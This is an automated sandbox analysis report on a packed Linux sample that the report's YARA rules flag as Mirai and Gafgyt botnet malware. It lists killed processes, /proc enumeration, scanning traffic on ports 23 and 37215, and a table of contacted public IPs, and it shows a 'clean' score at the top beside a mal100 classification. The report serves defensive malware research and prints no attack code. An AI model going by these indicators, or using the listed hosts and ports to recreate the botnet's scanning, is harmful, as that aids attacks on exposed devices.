Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5252, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5253, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5254, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5255, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5256, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5274, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5285, result: successful	Jump to behavior

Source: 9o6Z1wEokT

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: classification engine

Classification label: mal100.spre.troj.evad.lin@0/0@1/0

Data Obfuscation:

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior:

Enumerates processes within the "proc" file system

Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5143/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4453/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1582/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2033/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2275/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/3088/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1612/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1579/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1699/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1335/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1698/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2028/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1334/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1576/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2302/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/3236/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2025/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2146/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/910/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/912/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/517/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/759/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2307/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/918/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4460/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5153/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5274/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4461/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4462/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4465/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1594/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2285/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2281/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1349/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1623/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/761/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1622/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/884/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1983/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2038/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1344/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1465/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1586/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1860/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1463/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2156/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/800/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/801/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1629/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4459/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1627/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1900/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5043/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5285/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5200/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/3021/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/491/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2294/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2050/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1877/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/772/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1633/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1599/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1632/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/774/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1477/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/654/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/896/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1476/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1872/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2048/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/655/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1475/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2289/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/656/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/777/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/657/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/658/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/419/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/936/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1639/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1638/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2208/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2180/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4483/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4486/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1809/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1494/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1890/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2063/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2062/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1888/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1886/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/420/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1489/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/785/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1642/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/788/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/667/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/789/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5204/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1648/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2191/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4491/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4495/cmdline	Jump to behavior

Creates hidden files and/or directories

Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Directory: /home/saturnino/.cache	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Directory: /home/saturnino/.local	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Directory: /home/saturnino/.config	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.cache	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.local	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.config	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.config	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35056
Source: unknown	Network traffic detected: HTTP traffic on port 42128 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35062
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35070
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35078
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35082
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35108
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35146
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35164
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35220
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35230
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35234
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35240
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35248
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35254
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35306
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35316
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35324
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35330
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35338
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35354
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35378
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35382
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35388
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35404
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35410
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35422
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35456
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35466
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35500
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35506
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45540
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45552
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45556
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45562
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45570
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45592
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45596
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45604
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45618
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45646
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45650
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45656
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45700
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45714
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45722
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45734
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45746
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45750
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45756
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45760
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45768
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45770
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45782
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45800
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45814
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45822
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45844
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45870
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45884
Source: unknown	Network traffic detected: HTTP traffic on port 34666 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34666
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5251)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5252)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5253)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5254)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5256)	Queries kernel information via 'uname':	Jump to behavior

Stealing of Sensitive Information:

Yara detected Mirai

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Gafgyt

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Mirai

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Gafgyt

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
12.207.216.252	unknown	United States	7018	ATT-INTERNET4US	false
178.18.96.250	unknown	Russian Federation	8427	MAGINFO-ASMagnitogorskRussiaRU	false
51.37.119.129	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
202.161.141.133	unknown	Hong Kong	11919	LORAL-SKYNET-ARUS	false
222.226.32.46	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
74.52.27.51	unknown	United States	36351	SOFTLAYERUS	false
41.145.154.94	unknown	South Africa	5713	SAIX-NETZA	false
223.148.2.244	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
116.90.107.205	unknown	Pakistan	45814	FARIYA-PKFariyaNetworksPvtLtdPK	false
139.22.3.99	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
131.163.248.60	unknown	Canada	6591	INGR-ASNUS	false
117.115.137.146	unknown	China	4847	CNIX-APChinaNetworksInter-ExchangeCN	false
204.79.203.53	unknown	United States	19576	EASTERN-AS-01US	false
164.41.71.61	unknown	Brazil	21506	FundacaoUniversidadedeBrasiliaBR	false
205.176.15.147	unknown	United States	8103	STATE-OF-FLAUS	false
183.206.97.10	unknown	China	56046	CMNET-JIANGSU-APChinaMobilecommunicationscorporationCN	false
210.60.42.108	unknown	Taiwan; Republic of China (ROC)	1659	ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC	false
197.136.224.39	unknown	Kenya	36914	KENET-ASKE	false
71.167.226.28	unknown	United States	701	UUNETUS	false
41.51.170.27	unknown	South Africa	37168	CELL-CZA	false
78.209.96.98	unknown	France	12322	PROXADFR	false
115.178.4.124	unknown	Hong Kong	24506	YAHOO-TP2YAHOOTAIWANTW	false
148.29.157.23	unknown	United States	6400	CompaniaDominicanadeTelefonosSADO	false
141.93.110.68	unknown	Netherlands	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
104.119.90.59	unknown	United States	2828	XO-AS15US	false
82.60.20.181	unknown	Italy	3269	ASN-IBSNAZIT	false
41.190.129.207	unknown	Mauritius	36997	INFOCOM-UG	false
156.38.69.244	unknown	Togo	36924	GVA-CanalboxBJ	false
197.90.74.62	unknown	South Africa	10474	OPTINETZA	false
210.33.92.35	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
156.49.195.231	unknown	Sweden	29975	VODACOM-ZA	false
156.57.94.245	unknown	Canada	855	CANET-ASN-4CA	false
175.184.26.171	unknown	Japan	2510	INFOWEBFUJITSULIMITEDJP	false
197.12.117.158	unknown	Tunisia	37703	ATLAXTN	false
213.246.160.119	unknown	United Kingdom	8586	OBSL-ASTalkTalk-BusinessdivisionGB	false
156.235.189.126	unknown	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	false
197.237.248.144	unknown	Kenya	15399	WANANCHI-KE	false
210.25.254.104	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
218.85.108.163	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
98.163.92.7	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
144.79.42.106	unknown	unknown	24940	HETZNER-ASDE	false
18.138.65.36	unknown	United States	16509	AMAZON-02US	false
52.172.168.232	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
161.31.175.172	unknown	United States	40581	AREON-ASUS	false
2.6.97.90	unknown	France	3215	FranceTelecom-OrangeFR	false
197.190.12.213	unknown	Ghana	37140	zain-asGH	false
74.250.40.167	unknown	United States	6389	BELLSOUTH-NET-BLKUS	false
94.7.176.226	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
60.94.29.130	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
180.246.6.3	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	false
155.138.246.9	unknown	United States	20473	AS-CHOOPAUS	true
118.144.105.159	unknown	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
208.196.44.13	unknown	United States	701	UUNETUS	false
199.91.86.20	unknown	Canada	15247	RADIANT-VANCOUVERCA	false
109.183.48.98	unknown	Czech Republic	12767	PRAGONET-ASCZ	false
123.114.215.96	unknown	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
41.127.73.195	unknown	South Africa	16637	MTNNS-ASZA	false
40.28.77.69	unknown	United States	4249	LILLY-ASUS	false
178.60.215.125	unknown	Spain	12334	Galicia-SpainES	false
42.253.2.46	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
156.11.35.24	unknown	Canada	15290	ALLST-15290CA	false
41.35.35.154	unknown	Egypt	8452	TE-ASTE-ASEG	false
41.76.191.251	unknown	Kenya	37225	NETWIDEZA	false
197.47.108.232	unknown	Egypt	8452	TE-ASTE-ASEG	false
202.97.163.205	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
41.102.150.114	unknown	Algeria	36947	ALGTEL-ASDZ	false
120.186.107.194	unknown	Indonesia	4761	INDOSAT-INP-APINDOSATInternetNetworkProviderID	false
69.186.67.178	unknown	United States	3801	MISNETUS	false
156.121.7.93	unknown	United States	393504	XNSTGCA	false
115.126.52.106	unknown	Hong Kong	38186	FTG-AS-APForewinTelecomGroupLimitedISPatHK	false
